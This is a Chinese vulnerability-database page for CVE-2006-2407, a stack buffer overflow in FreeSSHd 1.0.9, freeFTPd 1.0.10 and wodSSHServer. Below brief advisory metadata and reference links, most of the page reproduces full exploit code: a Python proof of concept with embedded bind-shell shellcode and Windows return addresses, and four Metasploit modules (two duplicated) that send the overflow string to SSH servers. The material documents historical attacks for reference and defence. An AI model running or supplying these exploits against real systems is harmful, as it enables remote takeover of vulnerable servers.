CVE-2006-2407
CVSS7.5
发布时间 :2006-05-16 06:02:00
修订时间 :2016-10-17 23:39:53
NMCOEP    

[原文]Stack-based buffer overflow in (1) WeOnlyDo wodSSHServer ActiveX Component 1.2.7 and 1.3.3 DEMO, as used in other products including (2) FreeSSHd 1.0.9 and (3) freeFTPd 1.0.10, allows remote attackers to execute arbitrary code via a long key exchange algorithm string.


[CNNVD]wodSSHServer/freeSSHd 特制密钥交换算法字符串 溢出漏洞(CNNVD-200605-308)

        wodSSHServer和freeSSHd都是用于实现和支持SSH的产品。
        wodSSHServer和freeSSHd在处理从SSH客户端发送的特制密钥交换算法字符串时存在溢出漏洞,攻击者可以通过向服务器发送特制的请求导致执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:freesshd:freesshd:1.0.9
cpe:/a:freeftpd:freeftpd:1.0.10
cpe:/a:weonlydo:wodsshserver:1.2.7
cpe:/a:weonlydo:wodsshserver:1.3.3_demo

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2407
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2407
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-308
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=full-disclosure&m=114764338702488&w=2
(UNKNOWN)  FULLDISC  20060514 POC exploit for freeSSHd version 1.0.9
http://securityreason.com/securityalert/901
(UNKNOWN)  SREASON  901
http://www.kb.cert.org/vuls/id/477960
(UNKNOWN)  CERT-VN  VU#477960
http://www.securityfocus.com/archive/1/archive/1/434007/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060514 POC exploit for freeSSHd version 1.0.9
http://www.securityfocus.com/archive/1/archive/1/434038/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060515 Re: [Full-disclosure] POC exploit for freeSSHd version 1.0.9
http://www.securityfocus.com/archive/1/archive/1/434402/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060517 POC exploit for freeFTPd 1.0.10
http://www.securityfocus.com/archive/1/archive/1/434415/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060517 BUGTRAQ:20060517 Re:POC exploit for freeFTPd 1.0.10
http://www.securityfocus.com/archive/1/archive/1/434415/30/4920/threaded
(UNKNOWN)  BUGTRAQ  20060517 Re:POC exploit for freeFTPd 1.0.10
http://www.securityfocus.com/bid/17958
(UNKNOWN)  BID  17958
http://www.vupen.com/english/advisories/2006/1785
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1785
http://www.vupen.com/english/advisories/2006/1786
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1786
http://www.vupen.com/english/advisories/2006/1842
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1842
http://xforce.iss.net/xforce/xfdb/26442
(UNKNOWN)  XF  freesshd-key-exchange-bo(26442)

- 漏洞信息

wodSSHServer/freeSSHd 特制密钥交换算法字符串 溢出漏洞
高危 缓冲区溢出
2006-05-16 00:00:00 2006-05-30 00:00:00
远程  
        wodSSHServer和freeSSHd都是用于实现和支持SSH的产品。
        wodSSHServer和freeSSHd在处理从SSH客户端发送的特制密钥交换算法字符串时存在溢出漏洞,攻击者可以通过向服务器发送特制的请求导致执行任意指令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://freesshd.com/
        http://www.weonlydo.com/index.asp?showform=SSHServer

- 漏洞信息 (1787)

freeSSHd <= 1.0.9 Key Exchange Algorithm Buffer Overflow Exploit (EDBID:1787)
windows remote
2006-05-15 Verified
22 Tauqeer Ahmad
[点击下载] [点击下载]
#!/usr/bin/env python

"""
Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0
ahmadtauqeer[at]yahoo.com
Disclaimer: This Proof of concept exploit is for educational purpose only.
           Please do not use it against any system without prior permission.
           You are responsible for yourself for what you do with this code.

Greetings: All the Pakistani White Hats including me ;)
Flames:    To all the skript kiddies out there. Man grow up!.
Code tasted against freeSSHd version 1.0.9
If you didn't get shell at first try, try few times and you will get lucky

Advisories:
http://www.securityfocus.com/bid/17958
http://www.frsirt.com/english/advisories/2006/1786

"""
import socket
import getopt
import sys

host = "192.168.0.2"
port = 0
eip =""

#/* win32_bind -  EXITFUNC=thread LPORT=1977 Size=317 Encoder=None http://metasploit.com */
shellcode =    "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" \
               "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" \
               "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" \
               "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" \
               "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" \
               "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" \
               "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" \
               "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" \
               "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" \
               "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0" \
               "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff" \
               "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" \
               "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff" \
               "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64" \
               "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" \
               "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab" \
               "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51" \
               "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" \
               "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6" \
               "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0"


def exploit():

   buff = "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" \
          "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" \
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"

   buff = buff + "A" * 1055
   buff = buff + eip
   buff = buff + "yyyy"
   buff = buff + "\x90" * 4
   buff = buff + shellcode
   buff = buff + "B" * 19021 + "\r\n"

   sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
   sock.connect((host, port))
   print "+ Recive reply from server: " + sock.recv(1000)

   sock.send(buff)
   print "+ SSHD exploited. Now telnet to port 1977 to get shell "
   print "+ if you didnt get shell in first try.Try again until you success"

   sock.close()
   sock = None


def usage():
   print "#############################################"
   print "#           CODED BY TAUQEER AHMAD          #"
   print "#                 Scientist                 #"
   print "#############################################"
   print "\n"
   print "Usage: %s -h <hostip> -p <port> -o <OS>" % sys.argv[0]
   print "Following OS supported\n"
   print "1 Window XP SP1"
   print "2 Window XP SP2"
   print "3 Windows 2000 Advanced Server"


if __name__ == '__main__':

   if len(sys.argv) < 7:
       usage()
       sys.exit()

   try:
       options = getopt.getopt(sys.argv[1:], 'h:p:o:')[0]
   except getopt.GetoptError, err:
       print err
       usage()
       sys.exit()


   for option, value in options:
       if option == '-h':
           host = value
       if option == '-p':
           port = int(value)
       if option == '-o':
           if value == '1':
               eip = "\xFC\x18\xD7\x77"  # 77D718FC JMP ESP IN USER32.dll (Windows Xp professional SP1)
           elif value == '2':
               eip = "\x0A\xAF\xD8\x77"  # 77D8AF0A JMP ESP IN USER32.DLL (Windows Xp professional SP2)
           elif value == '3':
               eip = "\x4D\x3F\xE3\x77"  # 77E33F4D JMP ESP IN USER32.DLL (windows 2000 advanced server)
           elif value == '4:
	       eip = "\x29\x4c\xE1\x77"  # 77E14c29 JMP ESP IN USER32.DLL (windows 2000 Prof. SP4)
           else:
               usage()
               sys.exit()

   exploit()

# milw0rm.com [2006-05-15]
		

- 漏洞信息 (16461)

FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow (EDBID:16461)
windows remote
2010-05-09 Verified
0 metasploit
[点击下载] [点击下载]
##
# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow',
			'Description'    => %q{
					This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.
				This flaw is due to a buffer overflow error when handling a specially
				crafted key exchange algorithm string received from an SSH client.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					['CVE', '2006-2407'],
					['OSVDB', '25463'],
					['BID', '17958'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e56f43 } ],
					[ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e51877 } ],
					[ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77e53877 } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'May 12 2006',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(22)
			], self.class)
	end

	def exploit
		connect

		sploit =  "SSH-2.0-OpenSSH_3.9p1"
		sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
		sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
		sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
		sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"

		res = sock.recv(22)
		if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)
			print_status("Trying target #{target.name}...")
			sock.put(sploit)
		else
			print_status("Not running a vulnerable version...")
		end

		handler
		disconnect

	end
end
		

- 漏洞信息 (16462)

FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow (EDBID:16462)
windows remote
2010-05-09 Verified
0 metasploit
[点击下载] [点击下载]
##
# $Id: freeftpd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow',
			'Description'    => %q{
					This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10
				This flaw is due to a buffer overflow error when handling a specially
				crafted key exchange algorithm string received from an SSH client.
				This module is based on MC's freesshd_key_exchange exploit.
			},
			'Author'         => 'riaf [at] mysec.org',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					['CVE', '2006-2407'],
					['OSVDB', '25569'],
					['BID', '17958'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP0-SP4 English',  			{ 'Ret' => 0x750231e2 } ],
					[ 'Windows 2000 SP0-SP4 German',   			{ 'Ret' => 0x74f931e2 } ],
					[ 'Windows XP SP0-SP1 English',    			{ 'Ret' => 0x71ab1d54 } ],
					[ 'Windows XP SP2 English',       		 	{ 'Ret' => 0x71ab9372 } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'May 12 2006',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(22)
			], self.class)
	end

	def exploit
		connect

		sploit =  "SSH-2.0-OpenSSH_3.9p1"
		sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
		sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
		sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
		sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"

		res = sock.recv(40)
		if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/)
			print_status("Trying target #{target.name}...")
			sock.put(sploit)
		else
			print_status("Not running a vulnerable version...")
		end

		handler
		disconnect

	end
end
		

- 漏洞信息 (F83202)

FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow (PacketStormID:F83202)
2009-11-26 00:00:00
riaf  metasploit.com
exploit,overflow
CVE-2006-2407
[点击下载]

This Metasploit module exploits a simple stack overflow in FreeFTPd 1.0.10. This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client. This Metasploit module is based on MC's freesshd_key_exchange exploit.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow',
			'Description'    => %q{
				This module exploits a simple stack overflow in FreeFTPd 1.0.10
				This flaw is due to a buffer overflow error when handling a specially
				crafted key exchange algorithm string received from an SSH client.
				This module is based on MC's freesshd_key_exchange exploit.
			},
			'Author'         => 'riaf [at] mysec.org',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2006-2407'],
					['OSVDB', '25569'],
					['BID', '17958'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'Windows 2000 SP0-SP4 English',  			{ 'Ret' => 0x750231e2 } ],
					[ 'Windows 2000 SP0-SP4 German',   			{ 'Ret' => 0x74f931e2 } ],
					[ 'Windows XP SP0-SP1 English',    			{ 'Ret' => 0x71ab1d54 } ],
					[ 'Windows XP SP2 English',       		 	{ 'Ret' => 0x71ab9372 } ], 
				],

			'Privileged'     => true,

			'DisclosureDate' => 'May 12 2006',

			'DefaultTarget' => 0))

			register_options( [ Opt::RPORT(22) ], self.class)

	end

	def exploit
		connect

		sploit =  "SSH-2.0-OpenSSH_3.9p1" 
		sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
		sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
		sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
		sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"
               
		res = sock.recv(40)
			if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/)
				print_status("Trying target #{target.name}...")
				sock.put(sploit)                                
			else
				print_status("Not running a vulnerable version...")
			end
  
		handler
		disconnect

	end
end
    

- 漏洞信息 (F83007)

FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow (PacketStormID:F83007)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2006-2407
[点击下载]

This Metasploit module exploits a simple stack overflow in FreeSSHd 1.0.9. This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow',
			'Description'    => %q{
				This module exploits a simple stack overflow in FreeSSHd 1.0.9.
				This flaw is due to a buffer overflow error when handling a specially
				crafted key exchange algorithm string received from an SSH client.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2006-2407'],
					['OSVDB', '25463'],
					['BID', '17958'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e56f43 } ],
					[ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e51877 } ],
					[ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77e53877 } ],
				],

			'Privileged'     => true,

			'DisclosureDate' => 'May 12 2006',

			'DefaultTarget' => 0))

			register_options( [ Opt::RPORT(22) ], self.class)

	end

	def exploit
		connect

		sploit =  "SSH-2.0-OpenSSH_3.9p1" 
		sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
		sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
		sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
		sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"
               
		res = sock.recv(22)
			if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)
				print_status("Trying target #{target.name}...")
				sock.put(sploit)                                
			else
				print_status("Not running a vulnerable version...")
			end
  
		handler
		disconnect

	end
end
    

- 漏洞信息

25461
wodSSHServer Key Exchange Algorithm String Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-12 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站